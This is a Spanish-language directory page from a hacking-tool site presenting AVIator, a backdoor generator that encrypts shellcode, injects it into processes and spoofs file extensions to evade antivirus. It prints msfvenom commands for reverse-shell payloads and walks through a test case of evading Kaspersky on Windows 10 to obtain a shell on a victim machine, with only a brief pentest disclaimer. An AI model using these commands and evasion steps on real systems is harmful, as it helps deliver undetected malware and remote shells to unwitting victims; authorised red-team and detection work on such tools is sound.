Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
AVIator — Proyecto de evasión de antivirus | Kitploit
Herramientas/GitHubGitHub/ch0pin/aviator
Herramientas de Cifrado/DescifradoFrameworks de ExploitsGeneración de PayloadsShellcodePruebas de PenetraciónRed TeamingArchived
GitHubch0pin/aviator

AVIator

Proyecto de evasión de antivirus

Ver Repositorio
1.2k230hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

AviAtor Portado a NETCore 5 con una interfaz de usuario actualizada

AV|Ator

Acerca de://name

*AV: Antivirus

*Ator: Es un espadachín, alquimista, científico, mago, erudito e ingeniero, con la capacidad de a veces producir objetos de la nada (https://en.wikipedia.org/wiki/Ator)

Acerca de://purpose

AV|Ator es una utilidad generadora de puertas traseras, que utiliza técnicas criptográficas y de inyección para evadir la detección de antivirus. Más específicamente:

  • Utiliza cifrado AES para cifrar un shellcode dado
  • Genera un archivo ejecutable que contiene la carga útil cifrada
  • El shellcode se descifra e inyecta en el sistema objetivo usando varias técnicas de inyección

[https://attack.mitre.org/techniques/T1055/]:

  1. Inyección de ejecutable portátil que implica escribir código malicioso directamente en el proceso (sin un archivo en disco) y luego invocar la ejecución con código adicional o creando un hilo remoto. El desplazamiento del código inyectado introduce el requisito adicional de funcionalidad para reasignar referencias de memoria. Variaciones de este método, como la inyección reflectante de DLL (escribir una DLL auto-mapeada en un proceso) y el módulo de memoria (mapear DLL al escribir en el proceso), solucionan el problema de reubicación de direcciones.

  2. Secuestro de ejecución de hilo que implica inyectar código malicioso o la ruta a una DLL en un hilo de un proceso. Similar a Process Hollowing, el hilo debe estar suspendido primero.

Uso

La aplicación tiene un formulario que consta de tres entradas principales (Ver captura de pantalla abajo):

Screenshot 2019-04-29 at 11 41 21

  1. Un texto que contiene la clave de cifrado utilizada para cifrar el shellcode
  2. Un texto que contiene el IV utilizado para el cifrado AES
  3. Un texto que contiene el shellcode

Nota importante: El shellcode debe proporcionarse como un arreglo de bytes en C#.

Los valores predeterminados contienen shellcode que ejecuta notepad.exe (32 bits). Esta demo se proporciona como una indicación de cómo debe formarse el código (usando msfvenom, esto se puede hacer fácilmente con la opción -f csharp, p. ej. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

Después de completar las entradas proporcionadas y seleccionar la ruta de salida, se genera un ejecutable según las opciones elegidas.

Opción RTLO

En palabras simples, falsifica un archivo ejecutable para que parezca tener una extensión "inocente" como 'pdf', 'txt' etc. P. ej. el archivo "testcod.exe" será interpretado como "tesexe.doc"

Ten en cuenta que algunos antivirus alertan sobre la falsificación por sí misma como malware.

Establecer icono personalizado

Supongo que todos saben lo que es :)

Evadiendo Kaspersky AV en un host Win 10 x64 (CASO DE PRUEBA)

Obteniendo una shell en una máquina Windows 10 con Kaspersky AV completamente actualizado

Máquina objetivo: Windows 10 x64

  1. Crear la carga útil usando msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Usar AVIator con la siguiente configuración

    Arquitectura del SO objetivo: x64

    Técnica de inyección: Thread Hijacking (Arquitectura del shellcode: x64, Arquitectura del SO: x64)

    Procedimiento objetivo: explorer (dejar el predeterminado)

  3. Configurar el listener en la máquina atacante

  4. Ejecutar el exe generado en la máquina víctima

Instalación

Windows:

Compila el proyecto o descarga el ejecutable ya compilado desde la siguiente carpeta:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

Instala Mono según tu distribución de Linux, descarga y ejecuta los binarios, p. ej. en Kali:

root@kitploit:~
   root@kali# apt install mono-devel 
   
   root@kali# mono aviator.exe

Créditos

A Damon Mohammadbagher por el procedimiento de cifrado

Descargo de responsabilidad

Desarrollé esta aplicación para superar los desafíos exigentes del proceso de pentest y esta es la ÚNICA FORMA en que debe usarse esta aplicación. Asegúrate de tener el permiso necesario para usarla contra un sistema y nunca la uses con fines ilegales.

Descargar herramienta